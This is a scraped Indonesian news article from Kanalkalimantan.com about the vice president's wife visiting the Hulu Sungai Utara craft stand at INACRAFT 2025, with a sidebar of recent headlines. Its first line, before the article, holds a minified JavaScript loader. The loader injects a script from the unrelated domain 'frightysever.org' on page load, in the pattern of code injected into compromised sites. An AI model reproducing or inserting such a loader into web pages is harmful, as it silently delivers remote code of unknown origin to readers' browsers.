(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Istri Wapres Singgahi Stand Dekranasda HSU di INACRAFT 2025


KANALKALIMANTAN.COM, JAKARTA – Berbagai produk hasil kerajinan tangan dari Kabupaten Hulu Sungai Utara (HSU) turut dihadirkan pada gelaran INACRAFT 2025. Produk kerajinan tangan unggulan hasil Karya pengrajin HSU mendapatkan apresiasi positif dari Ketua Umum Dewan Kerajinan Nasional (Dekranas) Selvi Gibran Rakabuming.

Apresiasi tersebut disampaikan Selvi saat singgah ke stand Dekranasda HSU dalam acara pembukaan INACRAFT 2025 di Jakarta Convention Center (JCC), Rabu (5/2/2025). Selvi Gibran Rakabuming melakukan kunjungan ke sejumlah stand pameran didampingi Ketua Umum TP PKK Pusat Tri Tito Karnavian.

Stand Kabupaten Hulu Sungai Utara yang memamerkan berbagai kerajinan tangan tradisional, membuat
istri Wapres tersebut tampak antusias mengamati berbagai produk unggulan dari Hulu Sungai Utara, seperti anyaman dari eceng gondok, tas, dan perabot furnitur dari bahan purun, serta kain sasirangan.

Baca juga: Tanggap Darurat Sampah di Banjarmasin 6 Bulan

Pj Ketua Dekranasda HSU Gusti Elvira Riana Dewi Sari, mengaku bersyukur dan langsung menyambut kunjungan Ketua Umum Dekranas di stand HSU.

“Terima kasih kepada Ketua Umum Dekranas ibu Selvi Gibran Rakabuming yang sudah berkunjung ke stand Hulu Sungai Utara,” ujarnya.

Gusti Elvira berharap pengrajin di Kabupaten HSU terus mengangkat kearifan lokal dengan produk kerajinan tradisionalnya.

Baca juga: Pasar Murah di Guntung Manggis Bantu Masyarakat

INACRAFT 2025 menjadi ajang yang sangat penting untuk mempertemukan pengrajin dengan berbagai stakeholders, baik dari dalam negeri maupun luar negeri, termasuk pembeli, eksportir, dan para profesional industri.

Gusti Elvira mengucapkan terima kasih kepada Ketua Dekranasda Provinsi Kalimantan Selatan Hj Fathul Jannah Muhidin yang selalu memberikan dukungan dan pembinaan bagi perkembangan Dekranasda Kabupaten/Kota se Kalsel agar lebih maju.

Gelaran tahunan yang paling dinanti oleh industri kerajinan tangan Indonesia, INACRAFT 2025, resmi dibuka hari ini di Jakarta Convention Center (JCC), Jakarta.

Acara pembukaan pameran ini dihadiri oleh Menteri UMKM Maman Abdurrahman yang secara resmi meresmikan acara yang akan berlangsung selama lima hari ini.

Baca juga: Pengecer Boleh Jual Si Melon, Pangkalan di Banjarbaru Masih Pakai Skema KTP

Turut hadir dalam kegiatan para menteri dan wakil menteri kabinet merah putih, para duta besar negara sahabat, serta tamu undangan lainnya.

Pameran menghadirkan lebih dari seribu pengrajin dari berbagai penjuru Indonesia yang menampilkan beragam produk kerajinan lokal unggulan.

Menteri UMKM Maman Abdurrahman menekankan pentingnya sektor kerajinan tangan sebagai salah satu pilar ekonomi kreatif yang memiliki potensi besar, tidak hanya untuk meningkatkan perekonomian lokal tetapi juga untuk memperkenalkan kekayaan budaya Indonesia ke pasar global.

INACRAFT adalah panggung bagi kerajinan Indonesia untuk tampil di kancah internasional. Produk-produk unggulan ditampilkan menjadi karya seni yang mencerminkan identitas budaya bangsa.

Baca juga: Besok, KPU Banjar Tetapkan Bupati dan Wabup Banjar Terpilih 2025-2030

“Melalui acara seperti INACRAFT, kita berharap lebih banyak pengrajin Indonesia bisa merambah pasar ekspor, sekaligus meningkatkan kualitas produk mereka. Ini adalah langkah nyata dalam mewujudkan Indonesia sebagai pusat kreativitas dunia,” ujarnya.

Disamping Pj Ketua Dekranasda HSU turut hadir Asisten Bid Ekonomi Dan Pembangunan Setda HSU, Kepala Dinas Perindagkop HSU, Kabag Ekonomi, dan jajaran Dekranasda HSU. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Dua Hari Kunjungan Khusus di Lapas Banjarbaru saat Momen Lebaran

KANALKALIMANTAN.COM, BANJARBARU - Libur Lebaran Idulfitri menjadi momen spesial satu tahun sekali yang dilaksanakan oleh… Read More

9 jam ago

Ada Peristiwa Tertinggal saat Rekontruksi Pembunuhan Juwita, Begini Kata Tim Kuasa Hukum

KANALKALIMANTAN.COM, BANJARBARU - Reka adegan atau rekontruksi pembunuhan berencana yang dilakukan Jumran, anggota TNI AL… Read More

24 jam ago

Hadapi Porprov XII Kalsel, PBSI Balangan Gelar Seleksi Atlet

KANALKALIMANTAN.COM, PARINGIN - Pengurus Kabupaten (Pengkab) Persatuan Bulutangkis Seluruh Indonesia (PBSI) Balangan menggelar seleksi atlet… Read More

1 hari ago

Reka Adegan Jumran Habisi Juwita, Dipiting Lalu Dicekik

KANALKALIMANTAN.COM, BANJARBARU - Jumran melakukan reka adegan pembunuhan berencana yang dilakukan kepada Juwita, seorang jurnalis… Read More

1 hari ago

Dinsos Kalsel Salurkan Bantuan Banjir di Desa Pondok Babaris, Ini Kata Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Sinergisitas antara Pemerintah Kabupaten Hulu Sungai Utara dengan Pemerintah Provinsi Kalimantan Selatan… Read More

2 hari ago

Kuasa Hukum Ungkap Kronologi Indikasi Rudapaksa hingga Terbunuhnya Juwita di Tangan Jumran

KANALKALIMANTAN.COM, BANJARBARU – Fakta terbaru terkait dugaan rudapaksa oleh tersangka Jumran, anggota TNI Angkatan Laut… Read More

2 hari ago

This website uses cookies.